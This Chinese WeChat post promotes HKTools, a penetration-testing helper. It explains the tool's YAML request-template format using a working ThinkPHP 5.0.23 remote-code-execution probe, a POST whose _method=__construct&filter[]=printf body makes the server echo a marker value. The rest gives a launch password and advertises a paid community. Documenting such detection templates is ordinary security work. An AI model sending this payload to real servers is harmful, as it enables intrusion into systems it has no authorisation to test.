0x01 简介
一款辅助安全研发在日常工作中渗透测试、安全研究、安全开发等工作的工具! 程序支持Yaml格式的http请求模版
启动密码:
GMYTGMRTGMZDCNBQGIZ6PHEL42QLPZNNSDSYHD7IX6N6LCFW466JNZ5AQHSZHJXPXSAQ====
0x02 漏洞模板
基础语法
漏洞名称,必须为英文.
name: poc-yaml-thinkphp5023-method-rce
内置函数
set:
randomInt: 0,1
md5: 'admin'
发包配置
rules:
r1:
method: "POST"
path: "/index.php?s=captcha"
headers:
Content-Type: application/x-www-form-urlencoded
body: "_method=__construct&filter[]=printf&method=GET&server[REQUEST_METHOD]={{md5}}&get[]=1"
expression:
responsestatus: 200
responsebody: '{{md5}}'
r2:
method: "GET"
path: "/{{md5}}"
expression:
responsestatus: 404
responsebody: '{{md5}}'
-
r1:自定义请求函数名,从上到下依次执行请求函数
-
method:必须由单引号或双引号闭合,请求方式,当前支持POST、GET、PUT
-
path:必须由单引号或双引号闭合,请求路径
-
headers:可不写此项(直接删除,参考r2),一行一条,冒号左侧为键名,冒号右侧为键值
-
body:必须由单引号或双引号闭合,可不写此项(直接删除,参考r2),在GET请求中不应填写
-
responsestatus:不可存在单引号或双引号,必须填写,判断响应状态码
-
responsebody:必须由单引号或双引号闭合,必须填写,在响应正文中查找指定字符串
脚本信息
info:
author: Explang
Homepage: https://github.com/ExpLangcn
CodeLink:
- https://github.com/vulhub/vulhub/tree/master/thinkphp/5.0.23-rce
-
author:POC作者名称,不可为空,必须为英文
-
Homepage:个人主页链接
-
CodeLink:漏洞参考链接,一行一个
0x03 截图介绍
正则匹配
加密解密
http调试
http多个模版请求(支持批量请求多个模版,支持请求多次)
0x04 下载方式
公众号后台发送“HKTools”获取下载链接
0x05 知识星球
如同星球名字一样我是想做一个安全资源库,内容包括但不限于:安全工具/安全思路/技巧资料/学习资料,方向包括但不限于:WEB渗透/安全开发/内网渗透/免杀处理/零信任安全/云安全/工控安全/硬件安全/区块链安全等!
我会专注于分享一写我在做研发的时候遇到的一写比较有意思的点会将它们变成文档沉淀下来,以及我自己写的一些安全工具。
星球拥有完整的运营体系可放心加入。
加入星球共同学习提升自我,我荒废的今日,正是昨日殒身之人祈求的明日!望诸君 共勉之.
公众号后台发送“星球”解锁限时优惠
↓ 点击阅读原文观看演示视频
原文始发于微信公众号(寻云安全团队):【HKTools】一款辅助安全研发在日常工作中渗透测试、安全研究、安全开发等工作的工具
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论